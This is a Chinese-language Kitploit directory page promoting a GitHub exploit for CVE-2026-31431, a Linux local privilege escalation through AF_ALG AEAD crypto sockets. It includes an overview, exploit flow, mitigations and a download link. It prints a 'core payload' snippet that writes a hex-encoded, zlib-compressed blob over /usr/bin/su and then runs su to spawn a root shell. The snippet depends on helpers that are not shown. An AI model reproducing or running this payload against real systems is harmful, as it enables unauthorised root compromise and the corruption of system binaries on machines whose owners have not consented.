Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-31431 — CVE-2026-31431 的本地权限提升漏洞利用程序,通过滥用 AF_ALG AEAD 套接字处理,在易受攻击的 Linux 内核上获取 root shell 访问权限。 | Kitploit
工具/GitHubGitHub/adityabhatt3010/cve-2026-31431
权限提升漏洞利用框架漏洞利用二进制利用
GitHubadityabhatt3010/cve-2026-31431

CVE-2026-31431

CVE-2026-31431 的本地权限提升漏洞利用程序,通过滥用 AF_ALG AEAD 套接字处理,在易受攻击的 Linux 内核上获取 root shell 访问权限。

查看仓库
33个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

📌 CVE-2026-31431 – 通过 AEAD 加密套接字误用实现权限提升

🧠 概述

CVE-2026-31431 是一个 Linux 权限提升漏洞,它滥用了 AF_ALG(内核加密 API) 接口。通过构造与 AEAD(带关联数据的认证加密)套接字的恶意交互,攻击者可以提升权限并以 root 身份执行代码。

该漏洞利用了加密套接字操作处理不当的问题,允许受控的内存操作并最终实现权限提升。


⚠️ 影响

  • 本地权限提升
  • Root shell 访问(/usr/bin/su)
  • 影响具有易受攻击的内核加密实现的系统

🔍 技术分析

该漏洞利用程序:

  • 创建一个 AF_ALG 套接字

  • 绑定到:

    root@kitploit:~
    authenc(hmac(sha256),cbc(aes))
    
  • 通过 setsockopt 和 sendmsg 使用精心构造的载荷

  • 触发意外的内核行为

  • 通过以下方式进入 root shell:

    root@kitploit:~
    g.system("su")
    

关键指标:

  • 使用 socket(38,5,0) → AF_ALG
  • AEAD 操作
  • 通过压缩载荷(zlib)进行受控内存写入

💻 概念验证(PoC)

PoC

🔑 核心载荷片段:

**免责声明:我不拥有此 PoC。它仅用于教育目的,在获得许可的环境中进行测试。作者/所有者不对任何滥用行为负责。 **

root@kitploit:~
f=g.open("/usr/bin/su",0)
i=0
e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))

while i<len(e):
    c(f,i,e[i:i+4])
    i+=4

g.system("su")

🚀 漏洞利用流程

  1. 初始化加密套接字
  2. 配置 AEAD 参数
  3. 发送精心构造的载荷
  4. 触发内核缺陷
  5. 覆盖执行流程
  6. 生成 root shell

🛡️ 缓解措施

  • 将内核修补到最新版本
  • 限制对 AF_ALG 套接字的访问
  • 使用 LSM(AppArmor/SELinux)策略
  • 监控异常的加密 API 使用

🙏 致谢

  • PoC: https://github.com/theori-io/copy-fail-CVE-2026-31431

下载工具